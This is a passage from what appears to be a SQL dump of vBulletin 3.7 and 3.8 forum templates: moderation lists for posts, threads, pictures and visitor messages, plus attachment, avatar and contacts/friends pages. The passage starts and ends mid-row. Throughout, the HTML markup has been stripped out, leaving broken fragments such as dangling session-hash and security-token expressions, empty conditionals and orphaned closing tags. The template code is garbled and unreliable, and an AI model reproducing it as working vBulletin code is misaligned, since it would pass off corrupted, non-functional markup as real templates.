    \r\n\r\n\".(($show[\'havemessages\']) ? (\"\r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$moderation_filter', '$memberinfo_css\r\n\r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n\r\n\r\n
    \r\n
    \r\n $vbphrase[messages]: $messagetotal\r\n $messagephrase\r\n
    \r\n \r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \r\n
      \r\n $messagebits\r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n \r\n
    \r\n\r\n
    \r\n\r\n$moderation_filter', 'template', 1219151668, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1410, -1, 'moderation_pictures', '$memberinfo_css\r\n\r\n\r\n\r\n\".(($show[\'havepictures\']) ? (\"\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n \".(($show[\'havepictures\']) ? (\"\") : (\"\")).\"$vbphrase[pictures]: $picturetotal\r\n $messagephrase\r\n
    \r\n \".((!$show[\'havepictures\']) ? (\"\r\n
    \r\n $vbphrase[no_pictures_found]
    \r\n $vbphrase[try_controls_below_for_older_pictures]\r\n
    \r\n \") : (\"\r\n
      \r\n $picturebits\r\n
    \r\n\r\n \".(($show[\'inlinemod\'] OR $pagenav) ? (\"\r\n
    \r\n \r\n \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($pagenav) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n \")).\"\r\n
    \r\n\r\n\".(($show[\'havepictures\']) ? (\"\r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$moderation_filter', '$memberinfo_css\r\n\r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n\r\n\r\n
    \r\n
    \r\n $vbphrase[pictures]: $picturetotal\r\n $messagephrase\r\n
    \r\n \r\n
    \r\n $vbphrase[no_pictures_found]
    \r\n $vbphrase[try_controls_below_for_older_pictures]\r\n
    \r\n \r\n
      \r\n $picturebits\r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n \r\n
    \r\n\r\n
    \r\n\r\n$moderation_filter', 'template', 1219151607, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1411, -1, 'moderation_posts', '\r\n\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\".(($show[\'haveposts\']) ? (\"\r\n
    \r\n \".(($show[\'haveposts\']) ? (\"\") : (\"\")).\"$vbphrase[posts]: $totalposts\r\n \".(($show[\'deleted\']) ? (\"$vbphrase[deleted_posts]\") : (\"$vbphrase[moderated_posts]\")).\"\r\n
    \r\n\r\n $postbits\r\n\r\n\") : (\"\r\n \r\n \r\n \r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \r\n \r\n \r\n \r\n\")).\"\r\n\r\n\".(($show[\'haveposts\']) ? (\"\r\n\r\n \r\n \r\n \r\n \r\n
    $pagenav\r\n
    \r\n \".(($show[\'pagenav\']) ? (\"
    \") : (\"\")).\"$vbphrase[moderation]
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n $threadadmin_imod_menu\r\n
    \r\n \") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\".(($totalposts) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n
    $vbphrase[display_options]
    \" . construct_phrase(\"$vbphrase[showing_results_x_to_y_of_z]\", \"$limitlower\", \"$limitupper\", \"$totalposts\") . \"
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n  
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \\\"$vbphrase[new_posts]\\\"$vbphrase[new_posts]
    \\\"$vbphrase[no_new_posts]\\\"$vbphrase[no_new_posts]
    \r\n \r\n
    $forumjump
    \r\n', '\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n
    \r\n $vbphrase[posts]: $totalposts\r\n $vbphrase[deleted_posts]$vbphrase[moderated_posts]\r\n
    \r\n\r\n $postbits\r\n\r\n\r\n \r\n \r\n \r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n
    $pagenav\r\n
    \r\n
    $vbphrase[moderation]
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $threadadmin_imod_menu\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[display_options]
    $vbphrase[showing_results_x_to_y_of_z]
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n  
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[new_posts]\"$vbphrase[new_posts]
    \"$vbphrase[no_new_posts]\"$vbphrase[no_new_posts]
    \r\n \r\n
    $forumjump
    \r\n', 'template', 1230727813, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'), (1412, -1, 'moderation_threads', '\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\".(($show[\'havethreads\']) ? (\"\r\n\r\n \".(($show[\'threadicons\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \r\n \r\n\r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n\r\n$threadbits\r\n\") : (\"\r\n \r\n \r\n \r\n \r\n \r\n\")).\"\r\n
    \r\n $vbphrase[threads]: $totalthreads\r\n \".(($show[\'deleted\']) ? (\"$vbphrase[deleted_threads]\") : (\"$vbphrase[moderated_threads]\")).\"\r\n
      \r\n \".(($show[\'threadratings\']) ? (\"$vbphrase[rating] $sortarrow[voteavg]\") : (\"\")).\"\r\n $vbphrase[thread] $sortarrow[title] /\r\n $vbphrase[thread_starter] $sortarrow[postusername]\r\n $vbphrase[last_post] $sortarrow[lastpost]$vbphrase[replies] $sortarrow[replycount]$vbphrase[views] $sortarrow[views] \r\n \r\n
    \r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n
    \r\n\r\n\".(($show[\'havethreads\']) ? (\"\r\n \".(($show[\'ajax_js\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n\r\n \r\n \r\n \r\n
    $pagenav\r\n
    \r\n \".(($show[\'pagenav\']) ? (\"
    \") : (\"\")).\"$vbphrase[moderation]
    \r\n \r\n \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\".(($totalthreads) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n
    $vbphrase[display_options]
    \" . construct_phrase(\"$vbphrase[showing_threads_x_to_y_of_z]\", \"$limitlower\", \"$limitupper\", \"$totalthreads\") . \"
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n  
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'usehotthreads\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n \".(($show[\'dotthreads\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \\\"$vbphrase[new_posts]\\\"$vbphrase[new_posts]
    \\\"$vbphrase[no_new_posts]\\\"$vbphrase[no_new_posts]
    \\\"$vbphrase[hot_thread_with_new_posts]\\\"\" . construct_phrase(\"$vbphrase[more_than_x_replies_or_y_views]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \"
    \\\"$vbphrase[hot_thread_with_no_new_posts]\\\"\" . construct_phrase(\"$vbphrase[more_than_x_replies_or_y_views]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \"
    \\\"$vbphrase[closed_thread]\\\"$vbphrase[thread_is_closed]
    \\\"$vbphrase[thread_contains_a_message_written_by_you]\\\"$vbphrase[you_have_posted_in_this_thread]
    \r\n \r\n
    $forumjump
    \r\n\r\n\r\n\".(($show[\'popups\'] AND $show[\'havethreads\']) ? (\"\r\n
    \r\n $threadadmin_imod_menu\r\n
    \r\n\") : (\"\")).\"', '\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$threadbits\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n $vbphrase[threads]: $totalthreads\r\n $vbphrase[deleted_threads]$vbphrase[moderated_threads]\r\n
      \r\n $vbphrase[rating] $sortarrow[voteavg]\r\n $vbphrase[thread] $sortarrow[title] /\r\n $vbphrase[thread_starter] $sortarrow[postusername]\r\n $vbphrase[last_post] $sortarrow[lastpost]$vbphrase[replies] $sortarrow[replycount]$vbphrase[views] $sortarrow[views] \r\n \r\n
    \r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n
    \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n
    $pagenav\r\n
    \r\n
    $vbphrase[moderation]
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[display_options]
    $vbphrase[showing_threads_x_to_y_of_z]
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n  
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \"$vbphrase[new_posts]\"$vbphrase[new_posts]
    \"$vbphrase[no_new_posts]\"$vbphrase[no_new_posts]
    \"$vbphrase[hot_thread_with_new_posts]\"$vbphrase[more_than_x_replies_or_y_views]
    \"$vbphrase[hot_thread_with_no_new_posts]\"$vbphrase[more_than_x_replies_or_y_views]
    \"$vbphrase[closed_thread]\"$vbphrase[thread_is_closed]
    \"$vbphrase[thread_contains_a_message_written_by_you]\"$vbphrase[you_have_posted_in_this_thread]
    \r\n \r\n
    $forumjump
    \r\n\r\n\r\n\r\n
    \r\n $threadadmin_imod_menu\r\n
    \r\n
    ', 'template', 1208876742, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1413, -1, 'moderation_visitormessages', '$memberinfo_css\r\n\r\n\r\n\r\n\".(($show[\'havemessages\']) ? (\"\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n \".(($show[\'havemessages\']) ? (\"\") : (\"\")).\"$vbphrase[messages]: $messagetotal\r\n $messagephrase\r\n
    \r\n \".((!$show[\'havemessages\']) ? (\"\r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \") : (\"\r\n
      \r\n $messagebits\r\n
    \r\n \".(($show[\'inlinemod\'] OR $pagenav) ? (\"\r\n
    \r\n \r\n \r\n \".(($show[inlinemod]) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($pagenav) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n \")).\"\r\n
    \r\n\r\n\".(($show[\'havemessages\']) ? (\"\r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$moderation_filter', '$memberinfo_css\r\n\r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n\r\n\r\n
    \r\n
    \r\n $vbphrase[messages]: $messagetotal\r\n $messagephrase\r\n
    \r\n \r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \r\n
      \r\n $messagebits\r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n \r\n
    \r\n\r\n
    \r\n\r\n$moderation_filter', 'template', 1219152135, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1414, -1, 'modifyattachments', '
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\".(($show[\'attachquota\']) ? (\"\r\n\r\n \r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\".(($show[\'attachment_list\']) ? (\"\r\n\r\n\r\n \r\n \r\n \".(($show[\'deleteoption\']) ? (\"\r\n \r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n\r\n\r\n\r\n$template[attachmentlistbits]\r\n\r\n\r\n \r\n\r\n\r\n\") : (\"\r\n\r\n\r\n \r\n\r\n\r\n\")).\"\r\n
    \r\n \".(($show[\'attachquota\']) ? (\"\r\n \\\"$vbphrase[attachment_statistics]\\\"\r\n \") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[attachments_posted_by_x]\", \"$username\") . \"\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[attachment_statistics]\r\n \r\n \r\n \r\n \r\n \".(($show[\'attachlimit\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \" . construct_phrase(\"$vbphrase[currently_using_x_to_store_y_attachments]\", \"$attachsum\", \"$totalattachments\") . \"
    \r\n \r\n \r\n \".(($show[\'currentattachsize\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'totalattachsize\']) ? (\"\") : (\"\")).\"\r\n \r\n
      
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[attachment]$vbphrase[title]$vbphrase[date]$vbphrase[date]
    \r\n \r\n \".(($show[\'thumbnails\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=editattachments&pp=$perpage&page=$pagenumber\".(($show[\'otheruserid\']) ? (\"&u=$userid\") : (\"\")).\"\\\">$vbphrase[hide_thumbnails]\r\n \") : (\"\r\n session->vars[\'sessionurl\'] . \"do=editattachments&pp=$perpage&page=$pagenumber&showthumbs=1\".(($show[\'otheruserid\']) ? (\"&u=$userid\") : (\"\")).\"\\\">$vbphrase[show_thumbnails]\r\n \")).\"\r\n \r\n \".(($show[\'deleteoption\']) ? (\"\r\n \r\n \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n

    $vbphrase[you_have_no_attachments]

    \r\n
    \r\n\r\n
    \r\n\r\n\".(($show[\'lightbox\']) ? (\"\r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"', '
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n$template[attachmentlistbits]\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n
    \r\n \r\n \"$vbphrase[attachment_statistics]\"\r\n \r\n $vbphrase[attachments_posted_by_x]\r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[attachment_statistics]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[currently_using_x_to_store_y_attachments]
    \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[current_attachment_total_x]\"> $vbphrase[maximum_attachment_storage_x]\"> 
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[attachment]$vbphrase[title]$vbphrase[date]$vbphrase[date]
    \r\n \r\n \r\n &u=$userid\">$vbphrase[hide_thumbnails]\r\n \r\n &u=$userid\">$vbphrase[show_thumbnails]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n

    $vbphrase[you_have_no_attachments]

    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    ', 'template', 1208960526, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1415, -1, 'modifyattachmentsbit', '\r\n \r\n \r\n
    $post[size], \" . construct_phrase(\"$vbphrase[x_downloads]\", \"$post[counter]\") . \"
    \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'inprogress\']) ? (\"\r\n $vbphrase[in_progress]\r\n \") : (\"\r\n
    $post[postdate] \".((!$show[\'detailedtime\']) ? (\"$post[posttime]\") : (\"\")).\"
    \r\n \")).\"\r\n \r\n \".(($show[\'deletebox\']) ? (\"\r\n \r\n \") : (\"\r\n  \r\n \")).\"\r\n', '\r\n \r\n
    \r\n \r\n \"\"\r\n \r\n \"$post[attachmentextension]\" $post[filename]\r\n \r\n
    \r\n
    $post[size], $vbphrase[x_downloads]
    \r\n \r\n \r\n
    \r\n
    $vbphrase[thread]: $post[t_title]
    \r\n
    $vbphrase[post]: $post[p_title]
    \r\n
    \r\n \r\n \r\n \r\n $vbphrase[in_progress]\r\n \r\n
    $post[postdate] $post[posttime]
    \r\n
    \r\n \r\n \r\n \r\n \r\n  \r\n \r\n', 'template', 1201561215, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'), (1416, -1, 'modifyavatar', '\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_avatar]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[your_current_avatar]\r\n \r\n \r\n $currentavatar\r\n \r\n \r\n
    \r\n
    $vbphrase[avatars_small_graphics_short]
    \r\n
    \r\n
    $vbphrase[note_have_custom_avatar_delete]
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'forumavatars\']) ? (\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[predefined_x]\", \"$categoryname\") . \"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $avatarlist\r\n \".(($show[\'pagenav\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n \".(($show[\'categories\']) ? (\"\r\n $vbphrase[avatar_category]:
    \r\n \r\n \r\n \") : (\"\")).\"\r\n
    $vbphrase[may_select_predefined_as_avatar]
    \r\n $pagenav\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'customavatar\']) ? (\"\r\n
    \r\n $vbphrase[custom_avatar]\r\n\r\n
    \r\n
    \r\n\r\n $vbphrase[have_custom_avatar_want_as_is]

    \r\n\r\n

    \r\n\r\n $vbphrase[may_upload_custom_image_controls]

    \r\n\r\n \".(($show[\'customavatar_url\']) ? (\"\r\n $vbphrase[enter_url_to_image]\r\n\r\n
    \r\n \r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'customavatar_url\']) ? (\"$vbphrase[option_2_upload_image_from_computer]\") : (\"$vbphrase[upload_image_from_computer]\")).\"\r\n
    \r\n \r\n
    \r\n\r\n \".(($show[\'maxnote\']) ? (\"\r\n $maxnote\r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_avatar]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[your_current_avatar]\r\n \r\n \r\n $currentavatar\r\n \r\n \r\n
    \r\n
    $vbphrase[avatars_small_graphics_short]
    \r\n
    \r\n
    $vbphrase[note_have_custom_avatar_delete]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[predefined_x]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $avatarlist\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n $vbphrase[avatar_category]:
    \r\n \r\n \r\n
    \r\n
    $vbphrase[may_select_predefined_as_avatar]
    \r\n $pagenav\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[custom_avatar]\r\n\r\n
    \r\n
    \r\n\r\n $vbphrase[have_custom_avatar_want_as_is]

    \r\n\r\n

    \r\n\r\n $vbphrase[may_upload_custom_image_controls]

    \r\n\r\n \r\n $vbphrase[enter_url_to_image]\r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n $vbphrase[option_2_upload_image_from_computer]$vbphrase[upload_image_from_computer]\r\n
    \r\n \r\n
    \r\n\r\n \r\n $maxnote\r\n \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208875995, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1417, -1, 'modifyavatarbit', ' \r\n \r\n \r\n', ' \r\n \r\n \r\n', 'template', 1067805167, 'vBulletin Solutions', '', 'vbulletin'), (1418, -1, 'modifyavatarbit_custom', '\r\n userinfo[\'avatarurl\'] . \"\\\" alt=\\\"$vbphrase[custom_avatar]\\\" border=\\\"0\\\" />\r\n', '\r\n \"$vbphrase[custom_avatar]\"\r\n', 'template', 1094754561, 'vBulletin Solutions', '', 'vbulletin'), (1419, -1, 'modifyavatarbit_noavatar', '\r\n $vbphrase[no_avatar_specified]\r\n', '\r\n $vbphrase[no_avatar_specified]\r\n', 'template', 1072807062, 'vBulletin Solutions', '', 'vbulletin'), (1420, -1, 'modifyavatar_category', ' \r\n', ' \r\n', 'template', 1070079040, 'vBulletin Solutions', '', 'vbulletin'), (1421, -1, 'modifybuddylist', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[total]: $buddycount\r\n \".(($show[\'friend_controls\']) ? (\"$vbphrase[contacts_and_friends]\") : (\"$vbphrase[contacts]\")).\"\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \".(($show[\'friend_controls\']) ? (\"$vbphrase[contacts_and_friends]\") : (\"$vbphrase[contacts]\")).\" \r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \".(($show[\'avatars\']) ? (\"\r\n
      \r\n \") : (\"\r\n
        \r\n \")).\"\r\n $buddylist\r\n
      •  
      • \r\n
      \r\n
      \r\n \\\"\\\"\r\n \r\n
      \r\n
      \r\n \r\n
      \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n
      \\\"\\\"
      \r\n
      \r\n \r\n
      \r\n \r\n
      \r\n \r\n \".(($show[\'friend_controls\']) ? (\"\") : (\"\")).\"\r\n \\\"\\\"\r\n
      \r\n
      \r\n
      \r\n
      \r\n
      \r\n
      \".(($show[\'friend_controls\']) ? (\"$vbphrase[friends_instructions]\") : (\"$vbphrase[contacts_instructions]\")).\"
      \r\n
      \r\n
    \r\n\r\n
    \r\n $vbphrase[incoming_friend_requests]\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    $vbphrase[incoming_friend_requests]
    \r\n
    $vbphrase[incoming_friend_requests_description]
    \r\n
      \r\n $incominglist\r\n
    •  
    • \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \\\"\\\"\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[total]: $buddycount\r\n $vbphrase[contacts_and_friends]$vbphrase[contacts]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[contacts_and_friends]$vbphrase[contacts] \r\n
    style=\"display: none\">\r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n
    \r\n \r\n
      \r\n \r\n
        \r\n \r\n $buddylist\r\n
      •  
      • \r\n
      \r\n
      \r\n \"\"\r\n \r\n
      \r\n
      \r\n \r\n
      \r\n \r\n \r\n \r\n \r\n
      \"\"
      \r\n
      \r\n \r\n
      \r\n \r\n
      \r\n \r\n \r\n \"\"\r\n
      \r\n
      \r\n
      \r\n
      \r\n
      \r\n
      $vbphrase[friends_instructions]$vbphrase[contacts_instructions]
      \r\n
      \r\n
    \r\n\r\n
    style=\"display: none\">\r\n $vbphrase[incoming_friend_requests]\r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    $vbphrase[incoming_friend_requests]
    \r\n
    $vbphrase[incoming_friend_requests_description]
    \r\n
      \r\n $incominglist\r\n
    •  
    • \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \"\"\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1213106768, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1422, -1, 'modifybuddylist_user', '
  • \r\n \r\n \".(($show[\'outgoingrequest\']) ? (\"\r\n
    \r\n \") : (\"\".(($show[\'friend_checkbox\']) ? (\"\r\n
    \r\n \r\n \".(($user[\'extended_type\'] == \'friend\') ? (\"\") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\")).\"\r\n
    \r\n
  • \r\n', '
  • \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
